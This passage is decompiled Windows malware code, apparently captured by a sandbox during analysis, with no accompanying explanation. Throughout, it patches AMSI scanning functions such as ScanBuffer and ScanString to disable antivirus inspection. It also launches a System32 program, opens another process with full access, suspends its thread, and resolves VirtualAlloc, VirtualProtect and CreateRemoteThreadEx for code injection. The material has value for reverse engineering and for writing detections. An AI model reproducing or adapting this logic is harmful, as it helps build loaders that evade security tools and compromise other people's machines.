                                                                                                						E02174A98( &_v1248, E02174D64(_v1252));
                                                                                                						_pop(_t3790); // executed
                                                                                                						E02183690(_v1248, _t3378, _t3790, 0x2194b88); // executed
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1256, E02174D64(_v1260));
                                                                                                						_push(_v1256);
                                                                                                						_t3436 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1268, _t3436, 0x218e77c);
                                                                                                						E02174A98( &_v1264, E02174D64(_v1268));
                                                                                                						_pop(_t3795); // executed
                                                                                                						E02183690(_v1264, _t3378, _t3795, 0x2194b88); // executed
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1272, E02174D64(_v1276));
                                                                                                						_push(_v1272);
                                                                                                						_t3437 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1284, _t3437, 0x218e77c);
                                                                                                						E02174A98( &_v1280, E02174D64(_v1284));
                                                                                                						_pop(_t3800); // executed
                                                                                                						E02183690(_v1280, _t3378, _t3800, 0x2194b88); // executed
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanString");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1288, E02174D64(_v1292));
                                                                                                						_push(_v1288);
                                                                                                						_t3438 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1300, _t3438, 0x218e77c);
                                                                                                						E02174A98( &_v1296, E02174D64(_v1300));
                                                                                                						_pop(_t3805); // executed
                                                                                                						E02183690(_v1296, _t3378, _t3805, 0x2194b88); // executed
                                                                                                						_t3806 =  *0x2194bdc; // 0x3dd6718
                                                                                                						_t1893 =  *0x2194b74; // 0x3cea6a8
                                                                                                						E0218888C(_t1893, _t3378,  &_v1304, _t3806, _t4332, 0x2194b88);
                                                                                                						E021748F4(0x2194b2c, _v1304);
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1308, E02174D64(_v1312));
                                                                                                						_push(_v1308);
                                                                                                						_t3440 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1320, _t3440, 0x218e77c);
                                                                                                						E02174A98( &_v1316, E02174D64(_v1320));
                                                                                                						_pop(_t3812); // executed
                                                                                                						E02183690(_v1316, _t3378, _t3812, 0x2194b88); // executed
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1324, E02174D64(_v1328));
                                                                                                						_push(_v1324);
                                                                                                						_t3441 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1336, _t3441, 0x218e77c);
                                                                                                						E02174A98( &_v1332, E02174D64(_v1336));
                                                                                                						_pop(_t3817); // executed
                                                                                                						E02183690(_v1332, _t3378, _t3817, 0x2194b88);
                                                                                                						_t1925 =  *0x2194bcc; // 0x3e01b88
                                                                                                						_t1926 = E02177D88(_t1925, __eflags);
                                                                                                						_t1927 =  *0x2194b2c; // 0x4b24fa8
                                                                                                						E02188E78(_t1927, _t3378,  &_v1340, _t1926, 0x2194b88);
                                                                                                						E021748F4(0x2194b30, _v1340);
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1344, E02174D64(_v1348));
                                                                                                						_push(_v1344);
                                                                                                						_t3443 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1356, _t3443, 0x218e77c);
                                                                                                						E02174A98( &_v1352, E02174D64(_v1356));
                                                                                                						_pop(_t3824); // executed
                                                                                                						E02183690(_v1352, _t3378, _t3824, 0x2194b88); // executed
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1360, E02174D64(_v1364));
                                                                                                						_push(_v1360);
                                                                                                						_t3444 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1372, _t3444, 0x218e77c);
                                                                                                						E02174A98( &_v1368, E02174D64(_v1372));
                                                                                                						_pop(_t3829); // executed
                                                                                                						E02183690(_v1368, _t3378, _t3829, 0x2194b88); // executed
                                                                                                						_t1959 =  *0x2194b30; // 0x4ad2648
                                                                                                						E02188E04(_t1959, _t3378, _t3444,  &_v1380, _t4332, 0x2194b88);
                                                                                                						E02188C58(_v1380, _t3444,  &_v1376);
                                                                                                						E021748F4(0x2194b78, _v1376);
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("OpenSession");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1384, E02174D64(_v1388));
                                                                                                						_push(_v1384);
                                                                                                						_t3445 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1396, _t3445, 0x218e77c);
                                                                                                						E02174A98( &_v1392, E02174D64(_v1396));
                                                                                                						_pop(_t3837); // executed
                                                                                                						E02183690(_v1392, _t3378, _t3837, 0x2194b88); // executed
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1400, E02174D64(_v1404));
                                                                                                						_push(_v1400);
                                                                                                						_t3446 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1412, _t3446, 0x218e77c);
                                                                                                						E02174A98( &_v1408, E02174D64(_v1412));
                                                                                                						_pop(_t3842); // executed
                                                                                                						E02183690(_v1408, _t3378, _t3842, 0x2194b88); // executed
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanString");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v1416, E02174D64(_v1420));
                                                                                                						_push(_v1416);
                                                                                                						_t3447 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v1428, _t3447, 0x218e77c);
                                                                                                						E02174A98( &_v1424, E02174D64(_v1428));
                                                                                                						_pop(_t3847); // executed
                                                                                                						E02183690(_v1424, _t3378, _t3847, 0x2194b88);
                                                                                                						_t2007 =  *0x2194bd8; // 0x0
                                                                                                						E02174CB0(_t2007, 0x218e8cc);
                                                                                                						if(__eflags != 0) {
                                                                                                							L37:
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2132, E02174D64(_v2136));
                                                                                                							_push(_v2132);
                                                                                                							_t3448 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2144, _t3448, 0x218e77c);
                                                                                                							E02174A98( &_v2140, E02174D64(_v2144));
                                                                                                							_pop(_t3853); // executed
                                                                                                							E02183690(_v2140, _t3378, _t3853, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2148, E02174D64(_v2152));
                                                                                                							_push(_v2148);
                                                                                                							_t3449 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2160, _t3449, 0x218e77c);
                                                                                                							E02174A98( &_v2156, E02174D64(_v2160));
                                                                                                							_pop(_t3858); // executed
                                                                                                							E02183690(_v2156, _t3378, _t3858, 0x2194b88);
                                                                                                							_t2037 =  *0x2194bc4; // 0x3e01b48
                                                                                                							E02174CB0(_t2037, 0x218e8cc);
                                                                                                							if(__eflags == 0) {
                                                                                                								_t2540 =  *0x2194bc0; // 0x0
                                                                                                								E02174CB0(_t2540, 0x218e8cc);
                                                                                                								if(__eflags != 0) {
                                                                                                									_t2542 =  *0x2194bc8; // 0x0
                                                                                                									E02174CB0(_t2542, 0x218e8cc);
                                                                                                									if(__eflags != 0) {
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2164, E02174D64(_v2168));
                                                                                                										_push(_v2164);
                                                                                                										_t3467 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2176, _t3467, 0x218e77c);
                                                                                                										E02174A98( &_v2172, E02174D64(_v2176));
                                                                                                										_pop(_t4044); // executed
                                                                                                										E02183690(_v2172, _t3378, _t4044, 0x2194b88); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2180, E02174D64(_v2184));
                                                                                                										_push(_v2180);
                                                                                                										_t3468 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2192, _t3468, 0x218e77c);
                                                                                                										E02174A98( &_v2188, E02174D64(_v2192));
                                                                                                										_pop(_t4049); // executed
                                                                                                										E02183690(_v2188, _t3378, _t4049, 0x2194b88); // executed
                                                                                                										_t3469 =  *0x2194b34; // 0x3dfa858
                                                                                                										E02174BB0( &_v2196, _t3469, "C:\\Windows\\System32\\");
                                                                                                										WinExec(E02174D64(_v2196), 0); // executed
                                                                                                										Sleep(0x1f4); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2200, E02174D64(_v2204));
                                                                                                										_push(_v2200);
                                                                                                										_t3470 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2212, _t3470, 0x218e77c);
                                                                                                										E02174A98( &_v2208, E02174D64(_v2212));
                                                                                                										_pop(_t4055); // executed
                                                                                                										E02183690(_v2208, _t3378, _t4055, 0x2194b88); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2216, E02174D64(_v2220));
                                                                                                										_push(_v2216);
                                                                                                										_t3471 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2228, _t3471, 0x218e77c);
                                                                                                										E02174A98( &_v2224, E02174D64(_v2228));
                                                                                                										_pop(_t4060); // executed
                                                                                                										E02183690(_v2224, _t3378, _t4060, 0x2194b88);
                                                                                                										_t2605 =  *0x2194b34; // 0x3dfa858
                                                                                                										E02174A98( &_v2232, E02174D64(_t2605));
                                                                                                										E021857D0(_v2232, _t3378, 0x2194b90, _t4332, 0x2194b88, __eflags); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2236, E02174D64(_v2240));
                                                                                                										_push(_v2236);
                                                                                                										_t3472 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2248, _t3472, 0x218e77c);
                                                                                                										E02174A98( &_v2244, E02174D64(_v2248));
                                                                                                										_pop(_t4067); // executed
                                                                                                										E02183690(_v2244, _t3378, _t4067, 0x2194b88); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2252, E02174D64(_v2256));
                                                                                                										_push(_v2252);
                                                                                                										_t3473 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2264, _t3473, 0x218e77c);
                                                                                                										E02174A98( &_v2260, E02174D64(_v2264));
                                                                                                										_pop(_t4072); // executed
                                                                                                										E02183690(_v2260, _t3378, _t4072, 0x2194b88);
                                                                                                										_t2639 =  *0x2194b90; // 0xdf8
                                                                                                										 *0x2194b94 = OpenProcess(0x1f0fff, 0, _t2639);
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2268, E02174D64(_v2272));
                                                                                                										_push(_v2268);
                                                                                                										_t3474 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2280, _t3474, 0x218e77c);
                                                                                                										E02174A98( &_v2276, E02174D64(_v2280));
                                                                                                										_pop(_t4077); // executed
                                                                                                										E02183690(_v2276, _t3378, _t4077, 0x2194b88); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2284, E02174D64(_v2288));
                                                                                                										_push(_v2284);
                                                                                                										_t3475 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2296, _t3475, 0x218e77c);
                                                                                                										E02174A98( &_v2292, E02174D64(_v2296));
                                                                                                										_pop(_t4082); // executed
                                                                                                										E02183690(_v2292, _t3378, _t4082, 0x2194b88);
                                                                                                										_t2669 =  *0x2194b94; // 0x850
                                                                                                										NtSuspendThread(_t2669); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2300, E02174D64(_v2304));
                                                                                                										_push(_v2300);
                                                                                                										_t3476 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2312, _t3476, 0x218e77c);
                                                                                                										E02174A98( &_v2308, E02174D64(_v2312));
                                                                                                										_pop(_t4087); // executed
                                                                                                										E02183690(_v2308, _t3378, _t4087, 0x2194b88); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2316, E02174D64(_v2320));
                                                                                                										_push(_v2316);
                                                                                                										_t3477 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2328, _t3477, 0x218e77c);
                                                                                                										E02174A98( &_v2324, E02174D64(_v2328));
                                                                                                										_pop(_t4092); // executed
                                                                                                										E02183690(_v2324, _t3378, _t4092, 0x2194b88); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2332, E02174D64(_v2336));
                                                                                                										_push(_v2332);
                                                                                                										_t3478 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2344, _t3478, 0x218e77c);
                                                                                                										E02174A98( &_v2340, E02174D64(_v2344));
                                                                                                										_pop(_t4097); // executed
                                                                                                										E02183690(_v2340, _t3378, _t4097, 0x2194b88); // executed
                                                                                                										_t2714 = E0217304C(0x38c);
                                                                                                										_push(_t2714);
                                                                                                										L021858FC();
                                                                                                										__eflags = _t2714;
                                                                                                										if(_t2714 == 0) {
                                                                                                											_push(0x218e77c);
                                                                                                											_push( *0x2194bb0);
                                                                                                											_push("ScanBuffer");
                                                                                                											E02174C24();
                                                                                                											E02174A98( &_v2348, E02174D64(_v2352));
                                                                                                											_push(_v2348);
                                                                                                											_t3479 =  *0x2194bb0; // 0x3e01b38
                                                                                                											E02174BB0( &_v2360, _t3479, 0x218e77c);
                                                                                                											E02174A98( &_v2356, E02174D64(_v2360));
                                                                                                											_pop(_t4102); // executed
                                                                                                											E02183690(_v2356, _t3378, _t4102, 0x2194b88); // executed
                                                                                                										} else {
                                                                                                											E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                										}
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("OpenSession");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2364, E02174D64(_v2368));
                                                                                                										_push(_v2364);
                                                                                                										_t3480 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2376, _t3480, 0x218e77c);
                                                                                                										E02174A98( &_v2372, E02174D64(_v2376));
                                                                                                										_pop(_t4107); // executed
                                                                                                										E02183690(_v2372, _t3378, _t4107, 0x2194b88); // executed
                                                                                                										E02174DBC(0x2194b78);
                                                                                                										_t2745 =  *0x2194b94; // 0x850, executed
                                                                                                										E0218779C(_t2745, _t3378, _t4332, 0x2194b88); // executed
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2380, E02174D64(_v2384));
                                                                                                										_push(_v2380);
                                                                                                										_t3482 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2392, _t3482, 0x218e77c);
                                                                                                										E02174A98( &_v2388, E02174D64(_v2392));
                                                                                                										_pop(_t4113); // executed
                                                                                                										E02183690(_v2388, _t3378, _t4113, 0x2194b88);
                                                                                                										_t2761 =  *0x2194b94; // 0x850
                                                                                                										_push(_t2761);
                                                                                                										L02188604();
                                                                                                										_push(0x218e77c);
                                                                                                										_push( *0x2194bb0);
                                                                                                										_push("ScanBuffer");
                                                                                                										E02174C24();
                                                                                                										E02174A98( &_v2396, E02174D64(_v2400));
                                                                                                										_push(_v2396);
                                                                                                										_t3483 =  *0x2194bb0; // 0x3e01b38
                                                                                                										E02174BB0( &_v2408, _t3483, 0x218e77c);
                                                                                                										E02174A98( &_v2404, E02174D64(_v2408));
                                                                                                										_pop(_t4118); // executed
                                                                                                										E02183690(_v2404, _t3378, _t4118, 0x2194b88); // executed
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2412, E02174D64(_v2416));
                                                                                                							_push(_v2412);
                                                                                                							_t3450 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2424, _t3450, 0x218e77c);
                                                                                                							E02174A98( &_v2420, E02174D64(_v2424));
                                                                                                							_pop(_t3864); // executed
                                                                                                							E02183690(_v2420, _t3378, _t3864, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2428, E02174D64(_v2432));
                                                                                                							_push(_v2428);
                                                                                                							_t3451 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2440, _t3451, 0x218e77c);
                                                                                                							E02174A98( &_v2436, E02174D64(_v2440));
                                                                                                							_pop(_t3869); // executed
                                                                                                							E02183690(_v2436, _t3378, _t3869, 0x2194b88);
                                                                                                							_t2067 =  *0x2194bc0; // 0x0
                                                                                                							E02174CB0(_t2067, 0x218e8cc);
                                                                                                							if(__eflags == 0) {
                                                                                                								_t2511 =  *0x2194bc4; // 0x3e01b48
                                                                                                								E02174CB0(_t2511, 0x218e8cc);
                                                                                                								if(__eflags != 0) {
                                                                                                									_t2513 =  *0x2194bc8; // 0x0
                                                                                                									E02174CB0(_t2513, 0x218e8cc);
                                                                                                									if(__eflags != 0) {
                                                                                                										_t2516 = E0217304C(0x38c);
                                                                                                										_push(_t2516);
                                                                                                										L021858FC();
                                                                                                										__eflags = _t2516;
                                                                                                										if(_t2516 == 0) {
                                                                                                											_push(0x218e77c);
                                                                                                											_push( *0x2194bb0);
                                                                                                											_push("ScanBuffer");
                                                                                                											E02174C24();
                                                                                                											E02174A98( &_v2444, E02174D64(_v2448));
                                                                                                											_push(_v2444);
                                                                                                											_t3466 =  *0x2194bb0; // 0x3e01b38
                                                                                                											E02174BB0( &_v2456, _t3466, 0x218e77c);
                                                                                                											E02174A98( &_v2452, E02174D64(_v2456));
                                                                                                											_pop(_t4034);
                                                                                                											E02183690(_v2452, _t3378, _t4034, 0x2194b88);
                                                                                                										} else {
                                                                                                											E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                										}
                                                                                                										__eflags = 0;
                                                                                                										E02172FC4(0,  &_v2460);
                                                                                                										_push(_v2460);
                                                                                                										_t2535 = E02174DBC(0x2194b78);
                                                                                                										_pop(_t2536);
                                                                                                										E02183990(_t2536, _t3378, _t2535, 0x2194b88, _t4354);
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2464, E02174D64(_v2468));
                                                                                                							_push(_v2464);
                                                                                                							_t3452 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2476, _t3452, 0x218e77c);
                                                                                                							E02174A98( &_v2472, E02174D64(_v2476));
                                                                                                							_pop(_t3875); // executed
                                                                                                							E02183690(_v2472, _t3378, _t3875, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2480, E02174D64(_v2484));
                                                                                                							_push(_v2480);
                                                                                                							_t3453 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2492, _t3453, 0x218e77c);
                                                                                                							E02174A98( &_v2488, E02174D64(_v2492));
                                                                                                							_pop(_t3880); // executed
                                                                                                							E02183690(_v2488, _t3378, _t3880, 0x2194b88);
                                                                                                							_t2097 =  *0x2194bc8; // 0x0
                                                                                                							E02174CB0(_t2097, 0x218e8cc);
                                                                                                							if(__eflags == 0) {
                                                                                                								_t2486 =  *0x2194bc0; // 0x0
                                                                                                								E02174CB0(_t2486, 0x218e8cc);
                                                                                                								if(__eflags != 0) {
                                                                                                									_t2488 =  *0x2194bc4; // 0x3e01b48
                                                                                                									E02174CB0(_t2488, 0x218e8cc);
                                                                                                									if(__eflags != 0) {
                                                                                                										_t2491 = E0217304C(0x38c);
                                                                                                										_push(_t2491);
                                                                                                										L021858FC();
                                                                                                										__eflags = _t2491;
                                                                                                										if(_t2491 == 0) {
                                                                                                											_push(0x218e77c);
                                                                                                											_push( *0x2194bb0);
                                                                                                											_push("ScanBuffer");
                                                                                                											E02174C24();
                                                                                                											E02174A98( &_v2496, E02174D64(_v2500));
                                                                                                											_push(_v2496);
                                                                                                											_t3465 =  *0x2194bb0; // 0x3e01b38
                                                                                                											E02174BB0( &_v2508, _t3465, 0x218e77c);
                                                                                                											E02174A98( &_v2504, E02174D64(_v2508));
                                                                                                											_pop(_t4026);
                                                                                                											E02183690(_v2504, _t3378, _t4026, 0x2194b88);
                                                                                                										} else {
                                                                                                											E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                										}
                                                                                                										E021848A0(E02174DBC(0x2194b78), _t3378, _t4332, 0x2194b88, _t4354);
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2512, E02174D64(_v2516));
                                                                                                							_push(_v2512);
                                                                                                							_t3454 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2524, _t3454, 0x218e77c);
                                                                                                							E02174A98( &_v2520, E02174D64(_v2524));
                                                                                                							_pop(_t3886); // executed
                                                                                                							E02183690(_v2520, _t3378, _t3886, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("Initialize");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2528, E02174D64(_v2532));
                                                                                                							_push(_v2528);
                                                                                                							_t3455 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2540, _t3455, 0x218e77c);
                                                                                                							E02174A98( &_v2536, E02174D64(_v2540));
                                                                                                							_pop(_t3891); // executed
                                                                                                							E02183690(_v2536, _t3378, _t3891, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2544, E02174D64(_v2548));
                                                                                                							_push(_v2544);
                                                                                                							_t3456 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2556, _t3456, 0x218e77c);
                                                                                                							E02174A98( &_v2552, E02174D64(_v2556));
                                                                                                							_pop(_t3896); // executed
                                                                                                							E02183690(_v2552, _t3378, _t3896, 0x2194b88); // executed
                                                                                                							E02174A98( &_v2560, "VirtualProtect");
                                                                                                							_push(_v2560);
                                                                                                							E02174A98( &_v2564, "kernel32");
                                                                                                							_pop(_t3899);
                                                                                                							E02183690(_v2564, _t3378, _t3899, 0x2194b88);
                                                                                                							E02174A98( &_v2568, "VirtualAlloc");
                                                                                                							_push(_v2568);
                                                                                                							E02174A98( &_v2572, "kernel32");
                                                                                                							_pop(_t3902);
                                                                                                							E02183690(_v2572, _t3378, _t3902, 0x2194b88);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2576, E02174D64(_v2580));
                                                                                                							_push(_v2576);
                                                                                                							_t3457 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2588, _t3457, 0x218e77c);
                                                                                                							E02174A98( &_v2584, E02174D64(_v2588));
                                                                                                							_pop(_t3907); // executed
                                                                                                							E02183690(_v2584, _t3378, _t3907, 0x2194b88); // executed
                                                                                                							E02174A98( &_v2592, "VirtualProtect");
                                                                                                							_push(_v2592);
                                                                                                							E02174A98( &_v2596, "KernelBase");
                                                                                                							_pop(_t3910);
                                                                                                							E02183690(_v2596, _t3378, _t3910, 0x2194b88);
                                                                                                							E02174A98( &_v2600, "VirtualAlloc");
                                                                                                							_push(_v2600);
                                                                                                							E02174A98( &_v2604, "KernelBase");
                                                                                                							_pop(_t3913);
                                                                                                							E02183690(_v2604, _t3378, _t3913, 0x2194b88);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2608, E02174D64(_v2612));
                                                                                                							_push(_v2608);
                                                                                                							_t3458 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2620, _t3458, 0x218e77c);
                                                                                                							E02174A98( &_v2616, E02174D64(_v2620));
                                                                                                							_pop(_t3918); // executed
                                                                                                							E02183690(_v2616, _t3378, _t3918, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("UacInitialize");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2624, E02174D64(_v2628));
                                                                                                							_push(_v2624);
                                                                                                							_t3459 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2636, _t3459, 0x218e77c);
                                                                                                							E02174A98( &_v2632, E02174D64(_v2636));
                                                                                                							_pop(_t3923); // executed
                                                                                                							E02183690(_v2632, _t3378, _t3923, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("UacScan");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2640, E02174D64(_v2644));
                                                                                                							_push(_v2640);
                                                                                                							_t3460 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2652, _t3460, 0x218e77c);
                                                                                                							E02174A98( &_v2648, E02174D64(_v2652));
                                                                                                							_pop(_t3928); // executed
                                                                                                							E02183690(_v2648, _t3378, _t3928, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2656, E02174D64(_v2660));
                                                                                                							_push(_v2656);
                                                                                                							_t3461 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2668, _t3461, 0x218e77c);
                                                                                                							E02174A98( &_v2664, E02174D64(_v2668));
                                                                                                							_pop(_t3933); // executed
                                                                                                							E02183690(_v2664, _t3378, _t3933, 0x2194b88); // executed
                                                                                                							_t2240 = E0217304C(0x38c);
                                                                                                							__eflags = _t2240 - 0xc;
                                                                                                							if(_t2240 != 0xc) {
                                                                                                								E021748F4(0x2194bb8, 0x218ea48);
                                                                                                							} else {
                                                                                                								E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                							}
                                                                                                							E02174A98( &_v2672, "CreateRemoteThreadEx ");
                                                                                                							_push(_v2672);
                                                                                                							E02174A98( &_v2676, "kernelbase");
                                                                                                							_pop(_t3937);
                                                                                                							E02183690(_v2676, _t3378, _t3937, 0x2194b88);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("UacScan");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2680, E02174D64(_v2684));
                                                                                                							_push(_v2680);
                                                                                                							_t3462 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2692, _t3462, 0x218e77c);
                                                                                                							E02174A98( &_v2688, E02174D64(_v2692));
                                                                                                							_pop(_t3942); // executed
                                                                                                							E02183690(_v2688, _t3378, _t3942, 0x2194b88); // executed
                                                                                                							E02174A98( &_v2696, "ReportEventA");
                                                                                                							_push(_v2696);
                                                                                                							E02174A98( &_v2700, "advapi32");
                                                                                                							_pop(_t3945);
                                                                                                							E02183690(_v2700, _t3378, _t3945, 0x2194b88);
                                                                                                							E02174A98( &_v2704, "SetEncryptedFileMetadata");
                                                                                                							_push(_v2704);
                                                                                                							E02174A98( &_v2708, "advapi32");
